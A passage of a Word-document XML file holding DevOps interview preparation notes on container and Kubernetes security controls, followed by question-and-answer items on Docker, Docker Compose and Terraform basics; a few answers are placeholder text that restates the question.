        <w:t>Signed image enforcement</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Kubernetes Admission Control</w:t>
        <w:br/>
        <w:t>Before deployment, validate:</w:t>
        <w:br/>
        <w:t>Image is signed</w:t>
        <w:br/>
        <w:t>Image comes from trusted registry</w:t>
        <w:br/>
        <w:t>No privileged container</w:t>
        <w:br/>
        <w:t>No hostPath unless approved</w:t>
        <w:br/>
        <w:t>No root user</w:t>
        <w:br/>
        <w:t>Resources limits are defined</w:t>
        <w:br/>
        <w:t>Seccomp enabled</w:t>
        <w:br/>
        <w:t>Read-only root filesystem</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tools:</w:t>
        <w:br/>
        <w:t>Kyverno</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper</w:t>
        <w:br/>
        <w:t>Sigstore Policy Controller</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Pod Security Standards define Baseline and Restricted policies; the Restricted profile is intended for strong pod hardening. (Kubernetes)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Secure Kubernetes Runtime</w:t>
        <w:br/>
        <w:t>Pod security example:</w:t>
        <w:br/>
        <w:t>securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  runAsNonRoot: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  readOnlyRootFilesystem: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  allowPrivilegeEscalation: false</w:t>
        <w:br/>
        <w:t xml:space="preserve">  seccompProfile:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    type: RuntimeDefault</w:t>
        <w:br/>
        <w:t xml:space="preserve">  capabilities:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    drop:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - ALL</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Avoid:</w:t>
        <w:br/>
        <w:t>privileged: true</w:t>
        <w:br/>
        <w:t>hostNetwork: true</w:t>
        <w:br/>
        <w:t>hostPID: true</w:t>
        <w:br/>
        <w:t>hostPath: /</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Network Security</w:t>
        <w:br/>
        <w:t>Use Kubernetes NetworkPolicies:</w:t>
        <w:br/>
        <w:t>Default deny all traffic</w:t>
        <w:br/>
        <w:t>Allow only required pod-to-pod communication</w:t>
        <w:br/>
        <w:t>Restrict egress traffic</w:t>
        <w:br/>
        <w:t>Separate namespaces by environment</w:t>
        <w:br/>
        <w:t>Use service mesh mTLS if needed</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>frontend → backend → database</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Do not allow:</w:t>
        <w:br/>
        <w:t>frontend → database</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Secrets Management</w:t>
        <w:br/>
        <w:t>Do not store secrets in:</w:t>
        <w:br/>
        <w:t>Dockerfile</w:t>
        <w:br/>
        <w:t>Git repo</w:t>
        <w:br/>
        <w:t>ConfigMap</w:t>
        <w:br/>
        <w:t>Plain environment variables</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>Vault</w:t>
        <w:br/>
        <w:t>AWS Secrets Manager</w:t>
        <w:br/>
        <w:t>GCP Secret Manager</w:t>
        <w:br/>
        <w:t>Azure Key Vault</w:t>
        <w:br/>
        <w:t>Sealed Secrets</w:t>
        <w:br/>
        <w:t>External Secrets Operator</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Runtime Security</w:t>
        <w:br/>
        <w:t>Use tools like:</w:t>
        <w:br/>
        <w:t>Falco</w:t>
        <w:br/>
        <w:t>Sysdig Secure</w:t>
        <w:br/>
        <w:t>Aqua</w:t>
        <w:br/>
        <w:t>Prisma Cloud</w:t>
        <w:br/>
        <w:t>Defender for Cloud</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Detect:</w:t>
        <w:br/>
        <w:t>Shell inside container</w:t>
        <w:br/>
        <w:t>Crypto mining</w:t>
        <w:br/>
        <w:t>Suspicious network calls</w:t>
        <w:br/>
        <w:t>Privilege escalation</w:t>
        <w:br/>
        <w:t>Sensitive file access</w:t>
        <w:br/>
        <w:t>Container escape attempts</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>NIST’s container security guide recommends addressing risks across images, registries, orchestrators, containers, and host OS layers. (csrc.nist.gov)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Observability and Audit</w:t>
        <w:br/>
        <w:t>Collect:</w:t>
        <w:br/>
        <w:t>Kubernetes audit logs</w:t>
        <w:br/>
        <w:t>Container logs</w:t>
        <w:br/>
        <w:t>Runtime security alerts</w:t>
        <w:br/>
        <w:t>Image scan reports</w:t>
        <w:br/>
        <w:t>Admission controller violations</w:t>
        <w:br/>
        <w:t>Network flow logs</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>Prometheus</w:t>
        <w:br/>
        <w:t>Grafana</w:t>
        <w:br/>
        <w:t>ELK/OpenSearch</w:t>
        <w:br/>
        <w:t>Loki</w:t>
        <w:br/>
        <w:t>SIEM</w:t>
        <w:br/>
        <w:t>Cloud Logging</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"> Interview Answer</w:t>
        <w:br/>
        <w:t>I would design a secure container platform with security controls across the full lifecycle: source code, CI/CD, image registry, Kubernetes admission, runtime, networking, and monitoring. Images would be built using minimal base images, scanned for vulnerabilities, SBOMs would be generated, and images would be signed using Cosign. Only signed images from trusted registries would be allowed through admission controllers like Kyverno or OPA Gatekeeper. At runtime, pods would follow Kubernetes Restricted Pod Security Standards, run as non-root, use seccomp, drop Linux capabilities, and avoid privileged access. NetworkPolicies would enforce zero-trust communication between services, secrets would come from a dedicated secrets manager, and tools like Falco or Sysdig would provide runtime threat detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q400. Docker image design: How would you build secure, small, reproducible Docker images for production services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use multi-stage builds so build tools and intermediate artifacts never reach the final image, pin the base image to a specific digest (not a floating tag) for reproducibility, and run as a non-root user with a minimal or distroless final image to reduce attack surface. Scan images for vulnerabilities in CI before they can be pushed to a registry consumed by production, and keep image layers ordered so dependency installs (rarely changing) come before application code (frequently changing) to maximize build cache efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q401. Docker layer caching: How do Docker layers and cache affect build speed and image reproducibility?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Each Dockerfile instruction creates a cached layer, and Docker reuses cached layers up to the first instruction whose input changed, so ordering matters - put rarely-changing steps (installing OS packages, dependency installs) before frequently-changing steps (copying application code) to maximize cache hits and speed up builds. For reproducibility, pin base image digests and dependency versions rather than floating tags, since a cache hit on a floating tag can silently produce a different image than a clean build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q402. Docker base images: How do you choose between Ubuntu, Alpine, slim, and distroless base images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ubuntu/Debian full images are easiest to debug (shell, package manager) but largest; slim variants trim unnecessary packages while keeping a shell; Alpine is much smaller but uses musl libc, which can cause subtle compatibility issues with some compiled dependencies (notably some Python/Node native modules); distroless has no shell or package manager at all, minimizing attack surface for production but making debugging harder. Choose distroless or Alpine for production runtime images once the build is stable, and keep a slim/full image available for local development and debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q403. Docker non-root containers: Why should containers avoid running as root, and how do you implement that in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Running as root inside a container means a container breakout or misconfigured volume mount can grant root-equivalent access on the host, and Kubernetes Pod Security Standards increasingly block root containers by default. Implement it with a `RUN useradd -u 1000 appuser` and `USER appuser` in the Dockerfile, ensure file permissions on copied files and writable directories are set for that UID, and set runAsNonRoot in the Kubernetes securityContext to enforce it at admission time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q404. Docker secrets: How do you prevent secrets from leaking into Docker images, build logs, and runtime environment variables?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Never COPY secret files into the image or pass them as build ARGs (they persist in image layer history); use BuildKit secret mounts (`RUN --mount=type=secret`) which are available only during that build step and never written to a layer. At runtime, inject secrets via a mounted volume from Secret Manager/Kubernetes Secrets rather than plain environment variables where possible, since env vars are visible via `docker inspect` and process listings, and scan images with a tool like trufflehog before pushing to catch accidental leaks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q405. Docker registry: How do you tag, push, scan, and promote Docker images through environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build one immutable image per commit tagged with the git SHA (not just `latest`), push it to Artifact Registry, and run vulnerability scanning automatically on push, blocking promotion on critical findings. Promote the exact same image digest through dev -&gt; staging -&gt; production by re-tagging or updating a deployment manifest, rather than rebuilding per environment, so what was tested is exactly what ships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q406. Docker troubleshooting: A container works locally but fails in Kubernetes. How would you debug entrypoint, environment variables, filesystem, permissions, and health checks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with `kubectl describe pod` and `kubectl logs` to see the exit reason and any startup errors, then check that all required environment variables/ConfigMaps/Secrets are actually mounted in the pod spec (a common gap between local `docker run` and a Kubernetes manifest). Verify the entrypoint command matches what Kubernetes expects (no interactive TTY assumptions), check filesystem permissions if the container runs as non-root or with a read-only root filesystem, and confirm readiness/liveness probe paths and ports match what the app actually exposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q407. Docker networking: How does container networking work locally, and what changes when the container runs in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Locally, Docker creates a bridge network where containers get an internal IP and communicate via container name (Docker DNS) or published host ports; in Kubernetes, each pod gets its own IP on the cluster's pod network (via CNI), and Service objects provide a stable virtual IP and DNS name that load-balances across pod replicas, replacing Docker's single-host bridge model with a cluster-wide overlay/routed network plus kube-proxy or eBPF-based service routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q408. Docker volumes: When would you use bind mounts, volumes, or ephemeral container storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use bind mounts for local development to live-sync source code into a container; use named Docker volumes (or in Kubernetes, PersistentVolumes) for data that must survive container restarts and be managed independently of the container lifecycle, like database files; use ephemeral container storage (the writable layer or emptyDir in Kubernetes) for temporary scratch space that is fine to lose when the container restarts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q409. Docker Compose: When is Docker Compose useful, and why is it different from Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Docker Compose is ideal for local development and simple single-host setups where you want to define and run a small set of interdependent containers (app, database, cache) with one command and minimal ceremony. Kubernetes is designed for multi-host production orchestration - scheduling, self-healing, rolling updates, service discovery across nodes, autoscaling - which Compose does not provide; teams typically use Compose for local dev/test and Kubernetes for staging/production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q410. Docker production readiness: What checks should pass before a Docker image is approved for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The image should be built from a pinned, scanned base image with no critical/high vulnerabilities, run as a non-root user, have a minimal attack surface (no unnecessary packages or shells in distroless-style images), and define correct HEALTHCHECK or Kubernetes probe endpoints. It should also be built reproducibly from CI (not a developer laptop), signed/attested for provenance, and tagged immutably so the exact artifact tested in staging is the one deployed to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q411. Scenario - registry outage during deploy: Your container registry becomes unreachable mid-deployment and half the pods are on the new image, half on the old. How do you stabilize the rollout?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pause the rollout rather than retrying blindly - Kubernetes will keep trying to pull the new image for pods it hasn't scheduled yet, which just produces ImagePullBackOff noise while the registry is down. Check whether the already-running new-version pods are healthy; if so, hold the mixed state (most services tolerate a brief mixed-version window) until the registry recovers, then resume the rollout, or roll back to the old image tag if the mixed state is causing user-facing issues and the old image is still cached/pullable. Afterward, add a registry mirror or pull-through cache so a single registry outage can't stall production deployments again.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q412. Scenario - poisoned base image: A base image your Dockerfiles depend on was found to contain a vulnerable package after being in production for weeks. How do you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Identify every image built from that base by scanning your registry/CI history for the base image digest, not just the tag, since a floating tag may have already moved. Rebuild and redeploy affected services from a patched base image, prioritizing internet-facing services first, and treat this as validation for pinning base images by digest rather than tag going forward so you always know exactly what's deployed. Add automated scanning on a schedule (not just at build time) so a newly-disclosed CVE in an already-deployed image is caught within hours instead of being discovered weeks later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Docker &amp; Docker Compose (Build Design)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q413. Dockerfile layer order: In a Go build stage using COPY ./project /project, WORKDIR /project, then a single RUN chaining go mod download, go test ./..., and go build, why place COPY before WORKDIR, and why chain all three commands into one RUN instead of splitting them up?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Dockerfile layer order: In a Go build stage using COPY ./project /project, WORKDIR /project, then a single RUN chaining go mod download, go test ./..., and go build, why place COPY before WORKDIR, and why chain all three commands into one RUN instead of splitting them up?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q414. Compose env var consistency: If a service uses the same .env variable (e.g. ${DEFAULT_NGINX_VERSION}) for both its image tag and a build ARG like NGINX_VERSION, why keep them tied to one variable, and what breaks in the build or runtime image if those two values drift apart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Compose env var consistency: If a service uses the same .env variable (e.g. ${DEFAULT_NGINX_VERSION}) for both its image tag and a build ARG like NGINX_VERSION, why keep them tied to one variable, and what breaks in the build or runtime image if those two values drift apart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q415. Adding another Compose variant: To add a fourth service for another NGINX variant alongside three existing ones, what would you change in the Compose file to stay consistent, especially around BUILD_FILE, NGINX_VERSION, and the final image tag?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Adding another Compose variant: To add a fourth service for another NGINX variant alongside three existing ones, what would you change in the Compose file to stay consistent, especially around BUILD_FILE, NGINX_VERSION, and the final image tag?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Terraform &amp; IaC (361–450)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q416. Explain Infrastructure as Code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure as Code means managing infrastructure using version-controlled code rather than manual console changes. It improves repeatability, reviewability, automation, compliance, and disaster recovery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infrastructure As Code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Q417. What are Terraform providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform providers are plugins that allow Terraform to interact with APIs such as GCP, AWS, Azure, Kubernetes, and GitHub. Providers define available resources and data sources.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Providers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Q418. What is terraform init?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform init initializes a Terraform working directory. It downloads providers, configures the backend, and prepares modules before plan or apply.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Init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Q419. Explain terraform plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform plan shows the changes Terraform will make to reach the desired state. It is used for review, approval, and policy checks before applying changes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Plan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Q420. What is terraform apply?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform apply executes the planned infrastructure changes. In production it should be gated by review, policy checks, state locking, and rollback planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Apply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Q421. Explain terraform destroy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform destroy removes resources managed by Terraform. It is dangerous in production and should be protected with approvals and safeguards.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Destroy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Q422. Explain reusable modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Reusable modules expose inputs and outputs so common infrastructure patterns can be used repeatedly. Good modules are versioned, documented, tested, and opinionated enough to prevent misuse.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Reusable Modules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Q423. What is remote state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Remote state stores Terraform state in a shared backend such as GCS, S3, or Terraform Cloud. It enables team collaboration and safer automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Remote State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Q424. Explain state locking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: State locking prevents multiple Terraform runs from modifying the same state at the same time. It avoids race conditions and state corruption.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>State Locking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Q425. What is backend configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Backend configuration defines where Terraform stores state and how it locks it. Examples include GCS, S3 with DynamoDB locking, Azure Storage, and Terraform Cloud.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Backend Configuration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Q426. Explain Terraform workspaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform workspaces allow multiple state instances for the same configuration. They can separate environments, though many enterprises prefer separate directories or repos for stronger isolation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Workspaces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Q427. What is interpolation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Interpolation in Terraform inserts expressions, variables, resource attributes, and functions into configuration values. Modern HCL supports direct expressions without older interpolation-only syntax.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Interpolation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Q428. Explain variables in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform variables parameterize configuration so modules and environments can reuse the same code with different values. They can include types, defaults, validation, and sensitive flags.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Variables In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Q429. What are outputs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform outputs expose useful values from a module or root configuration, such as IDs, endpoints, or connection details. They can be consumed by users, automation, or other modules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
